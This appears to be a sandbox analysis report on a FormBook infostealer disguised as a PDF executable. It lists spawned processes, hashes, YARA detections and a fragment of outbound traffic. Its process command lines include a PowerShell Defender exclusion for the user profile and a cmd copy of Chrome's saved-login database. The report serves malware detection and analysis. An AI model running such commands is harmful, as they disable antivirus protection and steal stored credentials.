Aug 30, 2024 07:27:45.071137905 CEST	2472	OUT	Data Raw: 6b 36 61 50 64 6c 39 6a 44 62 51 68 67 50 31 6d 69 7a 47 44 6a 41 52 30 58 6f 79 45 49 32 4b 78 6c 6f 39 47 68 72 43 74 65 6b 65 58 39 44 78 78 52 32 52 57 45 31 4f 35 79 43 34 76 70 6e 4f 37 39 35 4e 6f 32 37 44 46 4a 36 66 4d 78 35 72 47 4f 4a Data Ascii: k6aPdl9jDbQhgP1mizGDjAR0XoyEI2Kxlo9GhrCtekeX9DxxR2RWE1O5yC4vpnO795No27DFJ6fMx5rGOJqiOXJoDxm6jAmDd~Z3hciSN47O9M61nNlZ-4Nv1Ox4NTwximfDpw_6AIwRFOBm-bsSF5lpu3byiT6YovYfj3f6O3SVDFrkUXOsVh674NiKvcBQ9ULPB5vSL3B73AKFdD5R77yAlmdbX5n20qHHY(9HY3kR4Yn3aSf

Target ID:	0
Start time:	01:25:56
Start date:	30/08/2024
Path:	C:\Users\user\Desktop\101 2043 5770 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\101 2043 5770 pdf.exe"
Imagebase:	0x7ff7d7850000
File size:	2'148'960 bytes
MD5 hash:	5E8E7DD95B3E592A44A3C61B7F8D91F8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:25:56
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:25:57
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:25:57
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:25:57
Start date:	30/08/2024
Path:	C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Wow64 process (32bit):
Commandline:	"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Imagebase:
File size:	166'912 bytes
MD5 hash:	A7790328035BBFCF041A6D815F9C28DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	01:25:58
Start date:	30/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0xa30000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:25:58
Start date:	30/08/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:26:01
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\ipconfig.exe"
Imagebase:	0xde0000
File size:	29'184 bytes
MD5 hash:	3A3B9A5E00EF6A3F83BF300E2B6B67BB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	01:26:07
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:26:07
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:26:09
Start date:	30/08/2024
Path:	C:\Users\user\101 2043 5770 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\101 2043 5770 pdf.exe"
Imagebase:	0x7ff680180000
File size:	2'148'960 bytes
MD5 hash:	5E8E7DD95B3E592A44A3C61B7F8D91F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:26:10
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:26:10
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:26:10
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:26:11
Start date:	30/08/2024
Path:	C:\Windows\System32\calc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\calc.exe"
Imagebase:
File size:	27'648 bytes
MD5 hash:	5DA8C98136D98DFEC4716EDD79C7145F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	01:26:11
Start date:	30/08/2024
Path:	C:\Windows\regedit.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\regedit.exe"
Imagebase:	0x7ff745a70000
File size:	370'176 bytes
MD5 hash:	999A30979F6195BF562068639FFC4426
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:26:12
Start date:	30/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\cmd.exe"
Imagebase:
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	01:26:12
Start date:	30/08/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\System32\svchost.exe"
Imagebase:
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	01:26:12
Start date:	30/08/2024
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
Imagebase:	0xa20000
File size:	828'368 bytes
MD5 hash:	6F0F06D6AB125A99E43335427066A4A1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	01:26:13
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\cmmon32.exe"
Imagebase:	0xc90000
File size:	36'352 bytes
MD5 hash:	DEC326E5B4D23503EA5176878DDDB683
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	01:26:18
Start date:	30/08/2024
Path:	C:\Users\user\101 2043 5770 pdf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\101 2043 5770 pdf.exe"
Imagebase:	0x7ff680180000
File size:	2'148'960 bytes
MD5 hash:	5E8E7DD95B3E592A44A3C61B7F8D91F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	01:26:18
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	01:26:18
Start date:	30/08/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	01:26:18
Start date:	30/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	01:26:18
Start date:	30/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	01:26:19
Start date:	30/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	01:26:19
Start date:	30/08/2024
Path:	C:\Program Files (x86)\Windows Media Player\wmplayer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
Imagebase:	0xd60000
File size:	166'912 bytes
MD5 hash:	A7790328035BBFCF041A6D815F9C28DF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	01:26:33
Start date:	30/08/2024
Path:	C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\raserver.exe"
Imagebase:	0x240000
File size:	107'520 bytes
MD5 hash:	D1053D114847677185F248FF98C3F255
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
